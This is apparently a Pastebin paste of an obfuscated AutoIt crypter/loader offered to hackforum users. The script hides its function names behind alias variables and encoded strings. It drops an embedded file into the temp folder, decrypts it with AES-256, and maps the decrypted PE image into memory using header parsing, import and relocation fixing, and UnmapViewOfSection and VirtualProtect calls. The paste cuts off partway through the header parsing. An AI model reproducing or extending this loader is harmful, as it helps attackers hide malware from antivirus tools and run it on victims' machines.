Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ; this has been offered by BrBi just give me +REP on hackforum as a sign of gratitude, ty!
- $ROOTKERNELADMINISTRATIONROOT=BINDLL
- $ROOTADMINISTRATIONROOTEXPLOITKERNEL=_CRYPT_STARTUP
- $BYPASSKERNELEXPLOITEXPLOITBYPASS=BINARYTOSTRING
- $EXPLOITEXPLOITBYPASSHOOK=_CRYPT_DECRYPTDATA
- $KERNELKERNELADMINISTRATIONROOTHOOK=DLLFROMMEMORY
- $ADMINISTRATIONBYPASSROOTKERNELBYPASSEXPLOIT=DLLCLOSE
- $KERNELROOTEXPLOITEXPLOITADMINISTRATION=FILEOPEN
- $EXPLOITADMINISTRATIONBYPASSHOOK=FILEREAD
- $ADMINISTRATIONADMINISTRATIONEXPLOITKERNEL=FILECLOSE
- $ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION=DLLSTRUCTCREATE
- $ROOTADMINISTRATIONHOOKKERNELBYPASSEXPLOIT=BINARYLEN
- $ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION=DLLSTRUCTSETDATA
- $HOOKROOTKERNELROOTHOOK=DLLSTRUCTGETPTR
- $BYPASSEXPLOITHOOKEXPLOIT=DLLSTRUCTCREATE
- $KERNELBYPASSROOTADMINISTRATION=DLLSTRUCTGETDATA
- $HOOKHOOKADMINISTRATIONHOOK=DLLSTRUCTGETDATA
- $ROOTKERNELHOOKHOOKBYPASSROOT=SETERROR
- $ADMINISTRATIONADMINISTRATIONADMINISTRATIONROOTEXPLOIT=DLLSTRUCTCREATE
- $HOOKBYPASSADMINISTRATIONHOOKKERNEL=DLLSTRUCTGETDATA
- $HOOKROOTBYPASSROOTROOTADMINISTRATION=SETERROR
- $ADMINISTRATIONROOTEXPLOITHOOKROOTBYPASS=DLLSTRUCTCREATE
- $HOOKHOOKROOTKERNEL=DLLSTRUCTGETDATA
- $ADMINISTRATIONBYPASSROOTEXPLOIT=DLLSTRUCTCREATE
- $EXPLOITADMINISTRATIONROOTADMINISTRATIONKERNEL=DLLSTRUCTGETDATA
- $KERNELADMINISTRATIONADMINISTRATIONHOOK=SETERROR
- $HOOKROOTKERNELROOT=DLLSTRUCTCREATE
- $ROOTROOTBYPASSROOT=SETERROR
- $KERNELKERNELKERNELROOTBYPASS=DLLSTRUCTCREATE
- $ROOTADMINISTRATIONEXPLOITBYPASSKERNELHOOK=SETERROR
- $EXPLOITADMINISTRATIONHOOKBYPASS=DLLSTRUCTGETDATA
- $EXPLOITHOOKEXPLOITKERNELADMINISTRATIONROOT=DLLSTRUCTGETDATA
- $KERNELROOTBYPASSKERNEL=DLLSTRUCTGETDATA
- $EXPLOITROOTBYPASSADMINISTRATION=DLLSTRUCTCREATE
- $ADMINISTRATIONBYPASSROOTROOTADMINISTRATIONADMINISTRATION=DLLSTRUCTGETDATA
- $BYPASSBYPASSKERNELEXPLOITADMINISTRATION=DLLSTRUCTGETDATA
- $EXPLOITHOOKEXPLOITROOTHOOK=DLLSTRUCTCREATE
- $EXPLOITROOTKERNELADMINISTRATIONROOTHOOK=DLLSTRUCTGETDATA
- $ROOTROOTBYPASSADMINISTRATION=DLLSTRUCTGETDATA
- $HOOKEXPLOITKERNELBYPASSROOTEXPLOIT=UNMAPVIEWOFSECTION
- $BYPASSKERNELROOTADMINISTRATION=_MEMVIRTUALALLOC
- $BYPASSEXPLOITROOTKERNEL=DLLSTRUCTGETPTR
- $HOOKROOTADMINISTRATIONEXPLOITHOOK=DLLSTRUCTGETDATA
- $BYPASSADMINISTRATIONEXPLOITBYPASS=VIRTUALPROTECT
- $KERNELROOTROOTKERNELKERNEL=_WINAPI_FREELIBRARY
- $HOOKHOOKBYPASSKERNELHOOKROOT=SETERROR
- $ROOTROOTEXPLOITBYPASS=DLLSTRUCTSETDATA
- $HOOKHOOKEXPLOITROOTEXPLOITKERNEL=DLLSTRUCTCREATE
- $HOOKADMINISTRATIONBYPASSEXPLOITKERNEL=DLLSTRUCTGETDATA
- $BYPASSBYPASSADMINISTRATIONBYPASS=DLLSTRUCTCREATE
- $HOOKROOTADMINISTRATIONHOOKKERNEL=DLLSTRUCTCREATE
- $KERNELBYPASSEXPLOITBYPASS=DLLSTRUCTGETDATA
- $EXPLOITROOTKERNELADMINISTRATIONHOOK=DLLSTRUCTGETDATA
- $ADMINISTRATIONROOTADMINISTRATIONKERNEL=DLLSTRUCTGETDATA
- $HOOKADMINISTRATIONEXPLOITBYPASSROOT=DLLSTRUCTGETDATA
- $BYPASSADMINISTRATIONADMINISTRATIONADMINISTRATION=VIRTUALPROTECT
- $BYPASSHOOKBYPASSBYPASSROOTKERNEL=DLLSTRUCTSETDATA
- $HOOKEXPLOITKERNELBYPASSADMINISTRATION=DLLSTRUCTCREATE
- $ADMINISTRATIONEXPLOITKERNELHOOKBYPASSBYPASS=DLLSTRUCTGETDATA
- $BYPASSBYPASSHOOKHOOKKERNELADMINISTRATION=DLLSTRUCTCREATE
- $HOOKHOOKADMINISTRATIONEXPLOITHOOK=DLLSTRUCTSETDATA
- $BYPASSEXPLOITKERNELROOT=DLLSTRUCTCREATE
- $BYPASSEXPLOITBYPASSROOTBYPASS=DLLSTRUCTGETDATA
- $ROOTEXPLOITHOOKADMINISTRATIONBYPASSHOOK=DLLSTRUCTCREATE
- $ADMINISTRATIONADMINISTRATIONKERNELADMINISTRATIONKERNELHOOK=DLLSTRUCTCREATE
- $BYPASSKERNELEXPLOITKERNEL=FIXIMPORTS
- $ADMINISTRATIONEXPLOITEXPLOITADMINISTRATIONHOOK=DLLSTRUCTCREATE
- $ADMINISTRATIONKERNELBYPASSROOTROOTADMINISTRATION=FIXRELOC
- $ADMINISTRATIONADMINISTRATIONBYPASSHOOK=DLLCALLADDRESS
- $KERNELEXPLOITADMINISTRATIONROOTBYPASSADMINISTRATION=_WINAPI_FREELIBRARY
- $KERNELROOTKERNELHOOKKERNELROOT=DLLSTRUCTGETSIZE
- $ROOTADMINISTRATIONROOTBYPASSEXPLOIT=DLLSTRUCTGETPTR
- $EXPLOITKERNELBYPASSKERNELHOOK=DLLSTRUCTCREATE
- $ADMINISTRATIONKERNELBYPASSKERNEL=DLLSTRUCTGETDATA
- $KERNELADMINISTRATIONEXPLOITROOTEXPLOITADMINISTRATION=DLLSTRUCTGETDATA
- $EXPLOITHOOKKERNELADMINISTRATIONEXPLOITADMINISTRATION=DLLSTRUCTCREATE
- $EXPLOITROOTROOTADMINISTRATIONEXPLOIT=DLLSTRUCTGETPTR
- $ADMINISTRATIONHOOKROOTROOT=DLLSTRUCTGETDATA
- $ROOTBYPASSADMINISTRATIONADMINISTRATION=BITSHIFT
- $EXPLOITEXPLOITKERNELROOTHOOK=DLLSTRUCTCREATE
- $BYPASSBYPASSHOOKEXPLOIT=BITAND
- $KERNELEXPLOITHOOKEXPLOITADMINISTRATIONHOOK=DLLSTRUCTSETDATA
- $BYPASSHOOKHOOKROOTADMINISTRATIONROOT=DLLSTRUCTGETDATA
- $EXPLOITBYPASSADMINISTRATIONROOTADMINISTRATIONEXPLOIT=DLLSTRUCTGETPTR
- $BYPASSBYPASSEXPLOITBYPASS=DLLSTRUCTGETSIZE
- $BYPASSBYPASSADMINISTRATIONKERNELKERNEL=DLLSTRUCTCREATE
- $HOOKEXPLOITHOOKBYPASSKERNEL=DLLSTRUCTCREATE
- $HOOKHOOKBYPASSROOTKERNEL=DLLSTRUCTGETDATA
- $ROOTEXPLOITKERNELEXPLOIT=DLLSTRUCTGETDATA
- $KERNELHOOKROOTBYPASSADMINISTRATION=DLLSTRUCTCREATE
- $ROOTKERNELROOTROOTADMINISTRATIONBYPASS=_WINAPI_STRINGLENA
- $BYPASSKERNELKERNELBYPASSHOOKADMINISTRATION=DLLSTRUCTGETDATA
- $BYPASSEXPLOITEXPLOITROOTEXPLOITBYPASS=_WINAPI_LOADLIBRARY
- $KERNELHOOKHOOKADMINISTRATION=DLLSTRUCTGETDATA
- $ADMINISTRATIONKERNELBYPASSROOTADMINISTRATIONEXPLOIT=DLLSTRUCTGETDATA
- $ROOTKERNELEXPLOITHOOKROOT=DLLSTRUCTGETDATA
- $HOOKKERNELHOOKHOOKEXPLOIT=DLLSTRUCTCREATE
- $KERNELBYPASSBYPASSHOOKROOT=DLLSTRUCTGETDATA
- $HOOKKERNELROOTKERNELEXPLOIT=BITSHIFT
- $KERNELEXPLOITADMINISTRATIONROOTROOT=BINARYMID
- $BYPASSHOOKADMINISTRATIONHOOKBYPASSKERNEL=GETPROCADDRESS
- $KERNELKERNELKERNELROOTHOOKEXPLOIT=BITAND
- $EXPLOITADMINISTRATIONADMINISTRATIONADMINISTRATION=DLLSTRUCTCREATE
- $ADMINISTRATIONADMINISTRATIONROOTEXPLOIT=_WINAPI_STRINGLENA
- $KERNELADMINISTRATIONEXPLOITKERNEL=DLLSTRUCTGETDATA
- $BYPASSBYPASSADMINISTRATIONADMINISTRATION=GETPROCADDRESS
- $HOOKBYPASSHOOKBYPASSBYPASS=DLLSTRUCTSETDATA
- $KERNELHOOKKERNELHOOK=DLLSTRUCTCREATE
- $ADMINISTRATIONROOTEXPLOITHOOKADMINISTRATIONHOOK=DLLCALL
- $BYPASSHOOKHOOKHOOKKERNELHOOK=_WINAPI_GETCURRENTPROCESS
- $EXPLOITROOTROOTBYPASSKERNELHOOK=SETERROR
- $HOOKEXPLOITEXPLOITEXPLOITKERNELKERNEL=DLLCALL
- $EXPLOITADMINISTRATIONBYPASSROOT=SETERROR
- $EXPLOITEXPLOITKERNELHOOKKERNELBYPASS=ISNUMBER
- $BYPASSKERNELBYPASSBYPASS=DLLCALL
- $ADMINISTRATIONROOTEXPLOITBYPASSROOTKERNEL=SETERROR
- #NoTrayIcon
- #include <WinAPI.au3>
- #include <Memory.au3>
- #include <Crypt.au3>
- FILEINSTALL("277.859016088769",@TEMPDIR&"/277.859016088769",1)
- $FILE=$ROOTKERNELADMINISTRATIONROOT(@TEMPDIR&"/277.859016088769")
- $ROOTADMINISTRATIONROOTEXPLOITKERNEL()
- $TEMP_DECRYPTED=$BYPASSKERNELEXPLOITEXPLOITBYPASS($EXPLOITEXPLOITBYPASSHOOK($FILE,STRINGDEC("usjrahxtezaapqoxpojhugijiagzyf","-15,-9,5,4,7,16,-9,4,3,-15,23,21,3,1,0,-10,-2,-1,7,14,-11,9,9,6,-1,19,13,-23,-23,14"),$CALG_AES_256))
- GLOBAL $HDLL=$KERNELKERNELADMINISTRATIONROOTHOOK($TEMP_DECRYPTED)
- $ADMINISTRATIONBYPASSROOTKERNELBYPASSEXPLOIT($HDLL)
- FUNC BINDLL($SFILE)
- LOCAL $HFILE=$KERNELROOTEXPLOITEXPLOITADMINISTRATION($SFILE,16)
- LOCAL $BBINARY=$EXPLOITADMINISTRATIONBYPASSHOOK($HFILE)
- $ADMINISTRATIONADMINISTRATIONEXPLOITKERNEL($HFILE)
- RETURN $BBINARY
- ENDFUNC
- FUNC DLLFROMMEMORY($BBINARYIMAGE)
- LOCAL $TBINARY=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$ROOTADMINISTRATIONHOOKKERNELBYPASSEXPLOIT($BBINARYIMAGE)&"]")
- $ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION($TBINARY,1,$BBINARYIMAGE)
- LOCAL $PPOINTER=$HOOKROOTKERNELROOTHOOK($TBINARY)
- LOCAL $TIMAGE_DOS_HEADER=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("cafcpiykeudtenowwkcwacdibognfe","0,7,-5,15,-80,-28,-24,-4,4,-18,-9,-66,-8,-51")&STRINGDEC("ubkwizcimjccdlngsyozqnmibctpmy","2,13,7,-19,-73,-56,22,11,-8,9,-20,11,-24,-11,5,13,-35,-24,-8,-21,-54")&STRINGDEC("jkmnqgfdegisgbolkjuviexnjchhmj","13,4,5,-10,-81,-23,-5,3,0,12,-46")&STRINGDEC("juwfbhmxssmocpwtpbcobugkqfdcsx","13,-6,-5,-2,-66,-22,-8,-12,-4,-16,-12,5,6,-1,-9,-1,-53")&STRINGDEC("ororjsbobfeuexuctebiilpjrlwbzr","8,-3,3,-14,-74,-32,7,11,3,9,1,-45,0,-23,-17,2,-2,-42")&STRINGDEC("yukurzknzqmfrnbgfeknadgrlcswyd","-2,-6,7,-17,-82,-45,-2,0,-17,-4,8,7,-45,10,18,11,-5,-42")&STRINGDEC("hcitseforjnbwwlesemwhzsnsofyji","15,12,9,-16,-83,-24,-5,9,-9,3,7,11,-50,1,8,13,-18,-42")&STRINGDEC("pcmexevhoapcnowlhnqvbmfdgzwdtb","7,12,5,-1,-88,-18,-35,-45")&STRINGDEC("nfvqivdzbivpwjjjsfyhgurvhktyga","9,9,-4,-13,-73,-35,-20,-63")&STRINGDEC("iqydohopzirvzgokzikhdtrfrtinsr","14,-2,-7,0,-79,-37,-7,-11,-23,2,1,-1,-13,-44")&STRINGDEC("bbhshyiatjhkveqyxbnxvwhjxektqt","21,13,10,-15,-72,-48,-25,-38")&STRINGDEC("woomgigoagyltoukvhgfvckhehksjr","0,0,3,-9,-71,-38,-20,-52")&STRINGDEC("knlkwzunftsaagncrdvuhpvaxdquzx","12,1,6,-7,-87,-40,-16,-2,9,-17,-18,19,8,8,0,-40")&STRINGDEC("wtdvwapqykauuhxanlidtihynoqjfc","0,-5,14,-18,-87,-18,6,-12,-7,1,0,4,-58")&STRINGDEC("jblctkcwzafjjioqysnjrwngwtnmrd","-7,6,-11,15,-84,-25,2,-4,-21,17,16,-5,-6,-14,-55,-20,-62")&STRINGDEC("wpaoqzttzejeftoafhonsuzlhxurjq","0,-1,17,-11,-81,-43,-47,-39,-49,-1,-5,9,14,-11,-9,8,-1,10,-52")&STRINGDEC("bpsytbsqlyrrlgxuaqcfzgtdtdaygh","21,-1,-1,-21,-84,-19,-46,-36,-35,-11,-12,-3,6,6,-23,-1,8,-2,11,-43")&STRINGDEC("ueqmamdbvlcyewgqnzlmsxoomyrhzj","-18,3,-16,5,-65,-27,1,17,-17,6,19,-20,-1,-69,-12,-63,-62,-29,-49")&STRINGDEC("ynlokakmzhypfrkhblsjjpqbrtbhzm","-21,9,3,3,-7,-65,-42,-9,-22,10,-20,3,13,-35,-5,-26,3,11,-46,14,-5,-40,-12,-1,-14,-15,16"),$PPOINTER)
- $PPOINTER+=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_DOS_HEADER,STRINGDEC("dxokaffwazvbipoiudpyjghgnmrmtj","-35,-20,-11,7,4,13,13,-40,5,-44,-17,21,-36,8,-10,-33,-16,-3,-12,-20,8"))
- LOCAL $SMAGIC=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_DOS_HEADER,STRINGDEC("rijddzsrdudkbminhfxzclaedyujxh","-37,-8,-3,5,-1"))
- IF NOT ($SMAGIC=="MZ")THEN
- RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(1,0,0)
- ENDIF
- LOCAL $TIMAGE_NT_SIGNATURE=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("vvxgrorfaveuzywnnofucsdksnzxpi","-18,1,-9,11,-14,-79,-31,3,6,-8,-4,-1,-5,-7,-18"),$PPOINTER)
- $PPOINTER+=4
- IF $KERNELBYPASSROOTADMINISTRATION($TIMAGE_NT_SIGNATURE,STRINGDEC("hfvlslrfzlxtfvheabssvtkdrwjdvd","-21,3,-15,2,-18,8,3,12,-21"))<>17744 THEN
- RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(2,0,0)
- ENDIF
- LOCAL $TIMAGE_FILE_HEADER=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("retwkmufmhmqqqdufngfgdcsnpuhur","5,10,-2,-19,-75,-32,-20,-3,-5,1,1,-12,-54")&STRINGDEC("jkyhbzkqgtbnrbyvhdlfukgrzrptzq","13,4,-7,-4,-66,-44,10,-4,-5,-15,16,-31,-12,-15,-20,-19,12,5,3,8,-2,-48")&STRINGDEC("fgdaygtgtzkeiogftjplkmhulfitfm","-2,16,11,17,-21,-71,-32,2,-7,-21,-39,-4,11,-10,-20,14,-19,3,0,-49")&STRINGDEC("zopsbydhesjliykcpzsrvtfauhflxz","-22,8,-1,-1,2,-89,-20,7,4,-5,10,-7,9,-37,4,-16,9,-13,-17,-3,-10,-32,-5,1,-9,-3,-43")&STRINGDEC("flefcfumutnglnuaesxlfacuwsbvwu","-2,11,10,12,1,-70,-39,8,-8,-18,-9,11,-29,-8,-34,24,8,-17,-9,0,13,-38")&STRINGDEC("sirkouutovjrulplwkbwilyyfdsrvn","4,6,0,-7,-79,-34,-12,6,-10,-39,-4,-35,-5,8,-7,3,-9,-10,10,-47,-4,-11,-21,-20,12,-41")&STRINGDEC("bbvlnjrojihsqathczonmpdpebdxvt","21,13,-4,-8,-78,-39,-10,-14,8,-8,-5,1,-12,17,-11,11,17,-17,-12,5"),$PPOINTER)
- LOCAL $INUMBEROFSECTIONS=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_FILE_HEADER,STRINGDEC("gqpiikbiiqmkisxanzdkqymhrqxvgn","-25,4,-3,-7,-4,7,-19,-3,-22,-12,-10,9,0,-4,-10,18"))
- $PPOINTER+=20
- LOCAL $TMAGIC=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("ltdxfwynlbjsvdanyihkuqwdrviztg","11,-5,14,-20,-70,-42,-24,-7,-3,1,-47"),$PPOINTER)
- LOCAL $IMAGIC=$KERNELBYPASSROOTADMINISTRATION($TMAGIC,1)
- LOCAL $TIMAGE_OPTIONAL_HEADER
- IF $IMAGIC=267 THEN
- IF @AUTOITX64 THEN RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(3,0,0)
- $TIMAGE_OPTIONAL_HEADER=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("ltdxfwynlbjsvdanyihkuqwdrviztg","11,-5,14,-20,-70,-42,-24,-7,-3,1,-47")&STRINGDEC("phtmbpkyvjtldmaevyoqfpsajvfkyr","-14,17,0,-8,-66,-35,-10,-15,-7,8,-40,-3,10,-2,4,13,-32,-20,3,2,3,-1,-5,-38")&STRINGDEC("pfrvamtwlzvahdajmnfnixukxqvjcn","-14,19,2,-17,-65,-32,-11,-9,3,-8,-42,8,6,7,4,8,-23,-9,12,5,0,-9,-7,-48")&STRINGDEC("zznqemumdcjfgbjqcxcfzdkzjgzraf","-22,-3,1,1,-1,-77,-34,-4,22,2,-27,0,-36,13,-6,-12,-40")&STRINGDEC("tgdxlnriionmhcmirelnaeboiclffe","-16,16,11,-6,-8,-78,-31,0,17,-10,-31,-7,-31,11,-4,11,-9,-4,0,-5,25,0,2,-43,-8,17,-11,-43")&STRINGDEC("anejkuipptdxyzpklmpuxkhkxqwuub","3,9,10,8,-7,-85,-22,-7,10,-15,-21,-18,-36,-12,-7,3,-3,7,-7,-20,-12,-2,18,-6,-20,-45,-22,-1,-20,-39")&STRINGDEC("cyotrfodsvhtzmzgavlxjcmpzjmpnq","1,-2,0,-2,-14,-70,-46,0,-15,-4,-3,-1,-7,-30,-20,-34,13,-2,6,1,-26,12,-4,-2,-6,-47")&STRINGDEC("ieqdjchuvhvquaxaaxfeicstnprmjy","-5,18,-2,14,-6,-67,-38,-20,-3,-3,-39,-11,-50,14,-20,4,-38")&STRINGDEC("rmoxhaieftsimilitgwvknhwnxxixz","-14,10,0,-6,-4,-65,-39,-4,13,-15,-36,-3,-41,-8,8,-8,-57")&STRINGDEC("ehjyoiekhvhjqdhnshxigdwplgzdbw","-1,15,5,-7,-11,-73,-28,2,-7,-15,-3,-40,-16,15,-3,-51")&STRINGDEC("exminvanugqcpyvxhdxhfyewdnjudn","-1,-1,2,9,-10,-86,-14,-9,-18,13,-8,12,-2,-56,-10,-15,-1,10,-11,-3,8,-5,-42")&STRINGDEC("ikovgnghvtwulshxaacxinhwmhwwhi","-5,12,0,-4,-3,-78,-33,1,-10,-15,-54,-9,-3,-12,6,-11,4,13,17,-61")&STRINGDEC("pkeodrwintgxsleputwcfakyqdjigk","7,4,13,-11,-68,-37,-22,1,1,-2,-24,-8,-14,6,-4,4,-12,-6,-16,-16,19,18,9,-20,-4,-14,-5,9,12,-2,-1,3,-42")&STRINGDEC("rsgizxjiqxfvzvpjysgpvumwnmxvgg","5,-4,11,-5,-90,-43,-1,5,-2,-6,-23,-6,-21,-4,-15,10,-16,-5,0,-29,3,-2,7,-18,-1,-23,-19,-4,12,2,-3,-5,-44")&STRINGDEC("ijyobiktanvrjgmgdsyofhppgikybt","14,5,-7,-11,-66,-28,-10,-10,14,4,-45,-5,-9,0,-8,-17,1,-1,-6,-6,9,6,-53")&STRINGDEC("whlayssemmndzorobazycfqwpgbnpx","0,7,6,3,-89,-38,-10,9,2,5,-37,9,-25,-8,-13,-25,3,17,-7,-16,12,8,-54")&STRINGDEC("uldpgdgovwxumqmmaaqgqyrwsdainm","2,3,14,-12,-71,-23,-6,-5,-7,-5,-37,0,-11,2,12,6,19,4,-4,-17,-12,-7,1,-14,-4,10,-38")&STRINGDEC("hfnduqnrlbroybqslnaqoogukwuauv","15,9,4,0,-85,-36,-5,-4,3,16,-31,6,-23,17,8,0,8,-9,12,-27,-10,3,12,-12,4,-9,-58")&STRINGDEC("nqpaymclyzlckbvmscnwxywpjhkamg","-10,6,-1,17,-21,-77,-12,-3,-11,-71,-58,-13,-6,16,-3,-4,-4,11,-24,-22,-12,-4,-18,-53")&STRINGDEC("faxgbzxuuvjkpasfhvbxxknkonfdel","-2,22,-9,11,2,-90,-37,-12,5,-17,-27,-5,-39,12,-18,1,-3,-59")&STRINGDEC("gnobcrxmwoyuussmjbbpxzefcjmlve","-3,9,0,16,1,-82,-37,-4,3,-10,-42,-15,-45,-14,-18,-9,-5,16,17,-53")&STRINGDEC("ieyxrrajxyexgteibukaitgbzhpdkv","-5,18,-10,-6,-14,-82,-30,-2,-19,-22,6,-37,14,-7,-42")&STRINGDEC("cdjqrrkrxphgwfhemgenaxowhhhhmw","20,11,8,-13,-82,-31,10,-16,-5,9,11,13,-18,7,-45")&STRINGDEC("haihznoatxwzjhtxfddiskisnhgxyj","15,14,9,-4,-90,-42,-3,11,-49,-16,-22,-8,-9,-5,0,-19,12,5,15,11,-10,-8,10,-56")&STRINGDEC("hvwuctdpudbiwukfefxlukkajrxhml","-4,1,-8,-3,1,-84,-17,-7,5,1,-19,-3,-36,-1,-10,-3,6,-20,-19,7,-16,7,11,4,-47")&STRINGDEC("xpyocpucykwklmcgpnjfxxvgxrqzvn","-20,7,-10,3,1,-80,-34,6,1,-6,-40,-5,-25,7,-2,-4,-5,-43,5,7,-11,-15,-2,-44")&STRINGDEC("itqjjtiqkyprnswzkdzxizyyvyflwz","-5,3,-2,8,-6,-84,-22,-8,15,-20,-33,-12,-38,-14,-22,-10,-25,1,-7,-19,9,-4,-20,-62")&STRINGDEC("wcpvnygzkdwoiefiynhkyiymolexfb","-19,20,-1,-4,-10,-89,-20,-17,15,1,-40,-9,-33,0,-5,7,-54,1,5,2,-16,11,-62")&STRINGDEC("sxefhvsraekvuxabluizrsvvnrtxgg","-15,-1,10,12,-4,-86,-39,-3,0,-1,-6,-4,-47,-12,0,5,7,-58")&STRINGDEC("otffztxddrgbujlpiyxifduzuypdjq","-11,3,9,12,-22,-84,-42,17,9,-16,-2,16,-38,-4,-26,6,-8,-56,-10,-5,-19,5,5,-21,-2"),$PPOINTER)
- $PPOINTER+=96
- ELSEIF $IMAGIC=523 THEN
- IF NOT @AUTOITX64 THEN RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(3,0,0)
- $TIMAGE_OPTIONAL_HEADER=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("ltdxfwynlbjsvdanyihkuqwdrviztg","11,-5,14,-20,-70,-42,-24,-7,-3,1,-47")&STRINGDEC("phtmbpkyvjtldmaevyoqfpsajvfkyr","-14,17,0,-8,-66,-35,-10,-15,-7,8,-40,-3,10,-2,4,13,-32,-20,3,2,3,-1,-5,-38")&STRINGDEC("pfrvamtwlzvahdajmnfnixukxqvjcn","-14,19,2,-17,-65,-32,-11,-9,3,-8,-42,8,6,7,4,8,-23,-9,12,5,0,-9,-7,-48")&STRINGDEC("zznqemumdcjfgbjqcxcfzdkzjgzraf","-22,-3,1,1,-1,-77,-34,-4,22,2,-27,0,-36,13,-6,-12,-40")&STRINGDEC("tgdxlnriionmhcmirelnaeboiclffe","-16,16,11,-6,-8,-78,-31,0,17,-10,-31,-7,-31,11,-4,11,-9,-4,0,-5,25,0,2,-43,-8,17,-11,-43")&STRINGDEC("anejkuipptdxyzpklmpuxkhkxqwuub","3,9,10,8,-7,-85,-22,-7,10,-15,-21,-18,-36,-12,-7,3,-3,7,-7,-20,-12,-2,18,-6,-20,-45,-22,-1,-20,-39")&STRINGDEC("cyotrfodsvhtzmzgavlxjcmpzjmpnq","1,-2,0,-2,-14,-70,-46,0,-15,-4,-3,-1,-7,-30,-20,-34,13,-2,6,1,-26,12,-4,-2,-6,-47")&STRINGDEC("ieqdjchuvhvquaxaaxfeicstnprmjy","-5,18,-2,14,-6,-67,-38,-20,-3,-3,-39,-11,-50,14,-20,4,-38")&STRINGDEC("lrbrvkwljjlvqewtjweaygvboxavrf","9,-9,12,2,-64,-55,-87,-35,3,-9,-5,-17,-47,-4,-4,-15,-47")&STRINGDEC("exminvanugqcpyvxhdxhfyewdnjudn","-1,-1,2,9,-10,-86,-14,-9,-18,13,-8,12,-2,-56,-10,-15,-1,10,-11,-3,8,-5,-42")&STRINGDEC("ikovgnghvtwulshxaacxinhwmhwwhi","-5,12,0,-4,-3,-78,-33,1,-10,-15,-54,-9,-3,-12,6,-11,4,13,17,-61")&STRINGDEC("pkeodrwintgxsleputwcfakyqdjigk","7,4,13,-11,-68,-37,-22,1,1,-2,-24,-8,-14,6,-4,4,-12,-6,-16,-16,19,18,9,-20,-4,-14,-5,9,12,-2,-1,3,-42")&STRINGDEC("rsgizxjiqxfvzvpjysgpvumwnmxvgg","5,-4,11,-5,-90,-43,-1,5,-2,-6,-23,-6,-21,-4,-15,10,-16,-5,0,-29,3,-2,7,-18,-1,-23,-19,-4,12,2,-3,-5,-44")&STRINGDEC("ijyobiktanvrjgmgdsyofhppgikybt","14,5,-7,-11,-66,-28,-10,-10,14,4,-45,-5,-9,0,-8,-17,1,-1,-6,-6,9,6,-53")&STRINGDEC("whlayssemmndzorobazycfqwpgbnpx","0,7,6,3,-89,-38,-10,9,2,5,-37,9,-25,-8,-13,-25,3,17,-7,-16,12,8,-54")&STRINGDEC("uldpgdgovwxumqmmaaqgqyrwsdainm","2,3,14,-12,-71,-23,-6,-5,-7,-5,-37,0,-11,2,12,6,19,4,-4,-17,-12,-7,1,-14,-4,10,-38")&STRINGDEC("hfnduqnrlbroybqslnaqoogukwuauv","15,9,4,0,-85,-36,-5,-4,3,16,-31,6,-23,17,8,0,8,-9,12,-27,-10,3,12,-12,4,-9,-58")&STRINGDEC("nqpaymclyzlckbvmscnwxywpjhkamg","-10,6,-1,17,-21,-77,-12,-3,-11,-71,-58,-13,-6,16,-3,-4,-4,11,-24,-22,-12,-4,-18,-53")&STRINGDEC("faxgbzxuuvjkpasfhvbxxknkonfdel","-2,22,-9,11,2,-90,-37,-12,5,-17,-27,-5,-39,12,-18,1,-3,-59")&STRINGDEC("gnobcrxmwoyuussmjbbpxzefcjmlve","-3,9,0,16,1,-82,-37,-4,3,-10,-42,-15,-45,-14,-18,-9,-5,16,17,-53")&STRINGDEC("ieyxrrajxyexgteibukaitgbzhpdkv","-5,18,-10,-6,-14,-82,-30,-2,-19,-22,6,-37,14,-7,-42")&STRINGDEC("cdjqrrkrxphgwfhemgenaxowhhhhmw","20,11,8,-13,-82,-31,10,-16,-5,9,11,13,-18,7,-45")&STRINGDEC("haihznoatxwzjhtxfddiskisnhgxyj","15,14,9,-4,-90,-42,-3,11,-49,-16,-22,-8,-9,-5,0,-19,12,5,15,11,-10,-8,10,-56")&STRINGDEC("fxdtghgofffvfipskrarjwglsumils","15,-15,10,0,-49,-52,-71,-28,3,20,-1,-39,0,-22,4,-18,-8,-7,-15,-13,9,-18,11,10,-14,-58")&STRINGDEC("vtrecaeijykmcbhuwuatuvngilhwbv","-1,-11,-4,15,-45,-45,-69,-22,-1,1,-6,-30,3,-15,12,-20,-20,-10,-30,-5,-8,-9,-5,13,-46")&STRINGDEC("iaovcgmbsqfyywjjupuzspzasjjwmm","12,8,-1,-2,-45,-51,-77,-15,-10,9,-1,-42,-19,-47,-5,-9,-5,-30,-16,-7,-14,2,-4,4,-56")&STRINGDEC("zldnfbilropcisfeguxfrysgszpxxg","-5,-3,10,6,-48,-46,-73,-25,-9,11,-11,-20,-3,-43,-1,-4,9,-50,-9,7,-5,-16,1,-44")&STRINGDEC("sxefhvsraekvuxabluizrsvvnrtxgg","-15,-1,10,12,-4,-86,-39,-3,0,-1,-6,-4,-47,-12,0,5,7,-58")&STRINGDEC("otffztxddrgbujlpiyxifduzuypdjq","-11,3,9,12,-22,-84,-42,17,9,-16,-2,16,-38,-4,-26,6,-8,-56,-10,-5,-19,5,5,-21,-2"),$PPOINTER)
- $PPOINTER+=112
- ELSE
- RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(3,0,0)
- ENDIF
- LOCAL $ISIZEOFIMAGE=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_OPTIONAL_HEADER,STRINGDEC("zsegnrzltluwowczdwtnhmfmrwgesz","-39,-10,21,-2,-31,-12,-49,1,-19,-5,-16"))
